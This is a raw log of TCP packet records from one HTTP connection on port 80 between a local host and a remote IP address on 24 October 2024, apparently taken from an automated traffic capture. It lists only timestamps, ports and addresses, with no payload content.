Oct 24, 2024 13:54:23.147854090 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.147874117 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.147887945 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.147897959 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.147923946 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.147933006 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.147958040 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.147993088 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.147993088 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.148004055 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.148029089 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.148062944 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.148063898 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.148082018 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.148099899 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.148106098 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.148133993 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.148138046 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.148169041 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.148173094 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.148207903 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.148241997 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.148241997 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.148261070 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.148277998 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.148309946 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.148310900 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.148322105 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.148348093 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.148380041 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.148412943 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.148422956 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.148447037 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.148456097 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.148480892 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.148487091 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.148515940 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.148547888 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.148557901 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.148581982 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.148586988 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.148617983 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.148641109 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.148650885 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.148652077 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.148684978 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.148688078 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.148720026 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.148730040 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.148755074 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.148766041 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.148789883 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.148811102 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.148824930 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.148829937 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.148859978 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.148866892 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.148894072 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.148897886 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.148929119 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.148936033 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.148962021 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.148967981 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.148996115 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.148998976 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.149029970 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.149035931 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.149065971 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.149096966 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.149106979 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.149132013 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.149148941 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.149162054 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.149174929 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.149195910 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.149199009 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.149230003 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.149234056 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.149262905 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.149270058 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.149298906 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.149301052 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.149333954 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.149338961 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.149369001 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.149378061 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.149403095 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.149414062 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.149437904 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.149441004 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.149476051 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.149509907 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.149522066 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.149543047 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.149544954 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.149578094 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.149580002 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.149616957 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.149621964 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.149651051 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.149681091 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.149683952 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.149694920 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.149719000 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.149749994 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.149759054 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.149784088 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.149818897 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.149825096 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.149854898 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.149859905 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.149894953 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.187938929 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.187995911 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.188014030 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.188035011 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.188046932 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.188070059 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.188091040 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.188107014 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.188121080 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.188143015 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.188179970 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.188186884 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.188241005 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.256954908 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.257002115 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.257034063 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.257059097 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.257061005 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.257098913 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.257111073 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.257134914 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.257138968 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.257172108 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.257175922 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.257209063 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.257225990 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.257249117 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.257251978 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.257302046 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.257308006 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.257339001 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.257379055 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.257391930 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.257443905 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.257473946 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.257488012 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.257502079 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.257525921 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.257563114 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.257595062 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.257605076 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.257632017 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.257658005 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.257673025 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.257699013 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.257718086 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.257726908 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.257762909 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.257796049 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.257810116 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.257833004 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.257849932 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.257868052 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.257898092 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.257905006 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.257908106 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.257940054 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.257966995 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.257975101 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.257986069 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.258009911 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.258016109 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.258044958 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.258048058 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.258085012 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.258096933 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.258132935 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.258148909 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.258162975 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.258171082 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.258214951 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.258249998 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.258258104 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.258284092 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.258286953 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.258318901 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.258352041 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.258357048 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.258404970 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.258450985 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.258457899 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.258517981 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.258548975 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.258555889 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.258584976 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.258619070 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.258629084 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.258654118 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.258690119 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.258692980 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.258728981 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.258742094 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.258776903 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.258805037 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.258816957 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.258838892 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.258858919 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.258893967 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.258898020 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.258948088 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.258965015 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.258990049 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.259001017 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.259047031 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.259061098 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.259115934 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.259147882 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.259166002 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.259181976 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.259186029 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.259217024 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.259221077 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.259254932 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.259273052 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.259310007 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.259318113 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.259356022 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.259378910 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.259424925 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.259433031 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.259485960 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.259519100 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.259535074 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.259552956 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.259552956 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.259586096 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.259591103 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.259620905 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.259629011 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.259656906 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.259660959 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.259692907 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.259696960 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.259727955 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.259736061 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.259763002 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.259768963 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.259799957 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.259803057 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.259838104 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.259840012 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.259871960 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.259876966 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.259907961 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.259910107 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.259941101 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.259947062 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.259975910 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.259979010 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.260004997 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.260040045 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.260054111 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.260073900 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.260108948 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.260123014 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.260139942 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.260174990 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.260180950 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.260204077 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.260212898 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.260237932 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.260241032 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.260273933 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.260277033 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.260308981 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.260343075 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.260355949 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.260375023 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.260376930 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.260412931 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.260416031 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.260442972 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.260452032 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.260476112 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.260481119 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.260512114 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.260513067 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.260549068 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.260582924 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.260602951 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.260616064 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.260622978 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.260672092 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.260706902 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.260715961 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.260746002 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.260761976 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.260795116 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.260823011 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.260833025 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.260850906 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.260888100 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.260904074 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.260940075 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.260943890 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.260973930 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.261013985 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.261025906 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.261059999 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.261092901 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.261100054 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.261147022 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.261156082 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.261179924 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.261200905 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.261244059 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.261254072 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.261298895 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.261307001 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.261346102 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.261362076 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.261435986 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.261473894 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.261476994 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.261511087 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.261521101 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.261544943 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.261569977 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.261584997 CEST	49714	80	192.168.2.6	95.182.96.50
Oct 24, 2024 13:54:23.261599064 CEST	80	49714	95.182.96.50	192.168.2.6
Oct 24, 2024 13:54:23.261646032 CEST	49714	80	192.168.2.6	95.182.96.50
